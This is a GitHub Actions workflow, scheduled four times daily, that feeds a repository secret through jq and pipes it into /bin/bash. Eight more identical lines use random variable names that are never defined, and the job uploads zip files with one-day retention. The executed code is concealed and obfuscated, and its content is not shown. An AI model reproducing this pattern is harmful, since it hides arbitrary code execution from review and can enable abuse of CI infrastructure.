name: jiexianzhuzhong
on:
  workflow_dispatch:

  schedule:
    - cron: '52 1,7,13,19 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiexianzhuzhong
        env:
          s13: ${{ secrets.s13 }}
        run: |
          printf '%s' "$s13" | jq -r .ze70832 | /bin/bash
          echo $z6 | jq -r .vwk3933 | /bin/bash
          echo $jws216 | jq -r .ldnv8399 | /bin/bash
          printf '%s' "$fco9" | jq -r .ojx82357 | /bin/bash
          printf '%s' "$zm15" | jq -r .kqlxn8008 | /bin/bash
          echo $s024 | jq -r .z8 | /bin/bash
          echo $mlb36 | jq -r .slrey823 | /bin/bash
          printf '%s' "$ffdu2898" | jq -r .saejz216 | /bin/bash
          printf '%s' "$t11" | jq -r .ebyi6 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: FFmJ7rbN
          path: "*.zip"
          retention-days: 1
